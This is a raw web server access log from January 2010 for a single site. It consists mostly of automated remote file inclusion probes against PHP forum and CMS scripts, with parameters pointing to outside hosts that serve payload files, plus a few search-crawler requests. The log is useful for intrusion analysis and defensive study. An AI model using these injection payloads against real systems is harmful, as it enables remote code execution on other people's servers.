69.175.68.18 - - [17/Jan/2010:19:09:04 -0800] "GET /%5Cmodules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:19:09:04 -0800] "GET /logs/access_090713.log//%5Cmodules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:19:09:05 -0800] "GET /logs/access_091012.log//%5Cmodules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:19:09:11 -0800] "GET /%5Cmodules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:19:09:11 -0800] "GET /logs/access_090831.log//%5Cmodules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:19:09:11 -0800] "GET /logs//%5Cmodules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.68.18 - - [17/Jan/2010:19:09:25 -0800] "GET /logs/access_090713.log//%5Cmodules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://med.buu.ac.th///components/com_mylink/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:19:10:47 -0800] "GET /logs/access_090727.log/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:19:10:47 -0800] "GET /logs/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:19:10:47 -0800] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:19:11:40 -0800] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:19:11:40 -0800] "GET /logs/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:19:11:41 -0800] "GET /logs/access_090824.log/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:19:11:50 -0800] "GET /logs/access_090727.log%20%20/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:19:12:16 -0800] "GET /logs/access_090824.log%20%20/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:19:13:17 -0800] "GET /logs/access_090831.log/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:19:13:17 -0800] "GET /logs/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:19:13:17 -0800] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:19:14:06 -0800] "GET /index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:19:14:06 -0800] "GET /logs/access_090831.log/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:19:14:06 -0800] "GET /logs/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:19:14:06 -0800] "GET /logs/access_090727.log/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
66.11.230.87 - - [17/Jan/2010:19:15:39 -0800] "GET /bbs/skin/zero_vote/error.php?dir=http://sugarbean.my/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
66.11.230.87 - - [17/Jan/2010:19:15:39 -0800] "GET /logs//bbs/skin/zero_vote/error.php?dir=http://sugarbean.my/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
66.11.230.87 - - [17/Jan/2010:19:15:39 -0800] "GET /logs/access_091207.log//bbs/skin/zero_vote/error.php?dir=http://sugarbean.my/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:19:16:04 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.72.28.14 - - [17/Jan/2010:19:16:04 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.72.28.14 - - [17/Jan/2010:19:16:17 -0800] "GET /logs/access.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.253.25.15 - - [17/Jan/2010:19:16:20 -0800] "GET /logs//administrator/components/com_virtuemart/delete_all.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:19:16:20 -0800] "GET /administrator/components/com_virtuemart/delete_all.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:19:16:20 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/delete_all.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:19:16:41 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.72.28.14 - - [17/Jan/2010:19:16:42 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.72.28.14 - - [17/Jan/2010:19:16:42 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
212.114.13.126 - - [17/Jan/2010:19:17:00 -0800] "GET /logs/access_091207.log//bbs/skin/zero_vote/error.php?dir=http://sugarbean.my/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
212.114.13.126 - - [17/Jan/2010:19:17:00 -0800] "GET /logs//bbs/skin/zero_vote/error.php?dir=http://sugarbean.my/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
212.114.13.126 - - [17/Jan/2010:19:17:00 -0800] "GET /bbs/skin/zero_vote/error.php?dir=http://sugarbean.my/chid.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:19:17:04 -0800] "GET /logs//components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:19:17:19 -0800] "GET /logs/access_090824.log/index.php.orig?option=com_performs&task=rss&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:19:17:27 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.72.28.14 - - [17/Jan/2010:19:17:27 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.72.28.14 - - [17/Jan/2010:19:17:29 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.72.28.14 - - [17/Jan/2010:19:22:31 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://scaner.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:19:23:32 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:19:23:32 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:19:23:33 -0800] "GET /logs/access_100111.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:19:23:51 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:19:23:51 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:19:23:53 -0800] "GET /logs/access_100111.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:19:24:53 -0800] "GET /logs/access_091207.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://scaner.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:19:25:07 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.72.28.14 - - [17/Jan/2010:19:25:09 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.72.28.14 - - [17/Jan/2010:19:25:14 -0800] "GET /logs/access_090720.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://scaner.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:19:29:53 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:19:29:53 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:19:29:53 -0800] "GET /logs/access_100111.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:19:32:44 -0800] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.72.28.14 - - [17/Jan/2010:19:32:44 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
189.72.28.14 - - [17/Jan/2010:19:32:44 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
74.223.143.131 - - [17/Jan/2010:19:32:52 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:19:32:52 -0800] "GET /logs/access_090803.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:19:32:55 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:19:32:55 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:19:32:58 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:19:32:59 -0800] "GET /logs/access_090803.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:19:33:27 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:19:33:28 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:19:33:29 -0800] "GET /logs/access_090803.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:19:33:31 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:19:33:32 -0800] "GET /logs/access_090803.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.223.143.131 - - [17/Jan/2010:19:33:35 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.outdoorbooks.co.kr/conf/img/temp/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.1.16.10 - - [17/Jan/2010:19:35:16 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://scaner.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.1.16.10 - - [17/Jan/2010:19:35:16 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://scaner.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.1.16.10 - - [17/Jan/2010:19:35:16 -0800] "GET /logs/access_090706.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://scaner.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:19:36:31 -0800] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:19:36:31 -0800] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
189.72.28.14 - - [17/Jan/2010:19:36:32 -0800] "GET /logs/access_100111.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.1.16.10 - - [17/Jan/2010:19:38:05 -0800] "GET /logs/access_091207.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://scaner.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.142.208.150 - - [17/Jan/2010:19:39:15 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.johngarzon.com.co/list/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.106.179 - - [17/Jan/2010:19:39:57 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.106.179 - - [17/Jan/2010:19:43:04 -0800] "GET /labia/?N=D HTTP/1.1" 200 524 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
91.142.208.150 - - [17/Jan/2010:19:44:05 -0800] "GET /logs/access_091207.log%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.johngarzon.com.co/list/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.34.235.197 - - [17/Jan/2010:19:44:17 -0800] "GET /logs/access_090629.log/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
72.34.235.197 - - [17/Jan/2010:19:44:17 -0800] "GET /contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
72.34.235.197 - - [17/Jan/2010:19:44:17 -0800] "GET /logs/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
72.34.235.197 - - [17/Jan/2010:19:44:47 -0800] "GET /logs/access_090921.log/contenido/cronjobs/move_articles.php?cfg[path][contenido]=http://henry14.isfreeweb.com/zboard/id/id1.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
67.195.37.161 - - [17/Jan/2010:19:46:01 -0800] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
64.1.16.10 - - [17/Jan/2010:19:47:44 -0800] "GET /logs/access_090706.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://scaner.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.1.16.10 - - [17/Jan/2010:19:48:51 -0800] "GET /logs/access_091207.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://scaner.ucoz.com/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:19:50:21 -0800] "GET /zboard/view.php?id=v2_notice&no=2/include/print_category.php?setup[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:19:50:21 -0800] "GET /logs//zboard/view.php?id=v2_notice&no=2/include/print_category.php?setup[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.253.25.15 - - [17/Jan/2010:19:50:21 -0800] "GET /logs/access_090914.log%20%20//zboard/view.php?id=v2_notice&no=2/include/print_category.php?setup[use_category]=1&dir=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.142.208.150 - - [17/Jan/2010:19:58:51 -0800] "GET /logs/access_090706.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.johngarzon.com.co/list/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:20:00:13 -0800] "GET /bbs//write_update.php?board_skin_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:20:00:13 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:20:00:13 -0800] "GET /logs/access.log//bbs//write_update.php?board_skin_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:20:00:34 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:20:00:34 -0800] "GET /logs/access.log//bbs//write_update.php?board_skin_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:20:00:34 -0800] "GET /bbs//write_update.php?board_skin_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:20:00:41 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:20:00:41 -0800] "GET /logs/access.log//bbs//write_update.php?board_skin_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:20:00:41 -0800] "GET /bbs//write_update.php?board_skin_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.142.208.150 - - [17/Jan/2010:20:00:47 -0800] "GET /logs/access_091207.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.johngarzon.com.co/list/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:20:01:54 -0800] "GET /logs/access.log%20%20//bbs//write_update.php?board_skin_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:20:02:30 -0800] "GET /logs/access.log%20%20//bbs//write_update.php?board_skin_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.142.208.150 - - [17/Jan/2010:20:03:24 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.johngarzon.com.co/list/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.142.208.150 - - [17/Jan/2010:20:03:24 -0800] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.johngarzon.com.co/list/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.142.208.150 - - [17/Jan/2010:20:03:25 -0800] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.johngarzon.com.co/list/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.142.208.150 - - [17/Jan/2010:20:03:29 -0800] "GET /logs/access_100111.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.johngarzon.com.co/list/heheh.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.149.85.32 - - [17/Jan/2010:20:03:44 -0800] "GET /logs/access.log%20%20//bbs//write_update.php?board_skin_path=http://disk.yonghyuk.pe.kr/comet/id1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.59.90 - - [17/Jan/2010:20:09:14 -0800] "GET /?sourcedir=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
69.175.59.90 - - [17/Jan/2010:20:09:22 -0800] "GET /logs/access_090907.log%20%20/?sourcedir=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.175.59.90 - - [17/Jan/2010:20:09:22 -0800] "GET /logs/?sourcedir=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:10:26 -0800] "GET /logs/access_090615.log/?sourcedir=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:10:26 -0800] "GET /?sourcedir=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:10:26 -0800] "GET /logs/?sourcedir=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:10:47 -0800] "GET /?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:10:47 -0800] "GET /logs/?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
85.17.199.105 - - [17/Jan/2010:20:10:47 -0800] "GET /logs/access_090615.log/?sourcedir=http://ambiancefairepart.com//bash/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
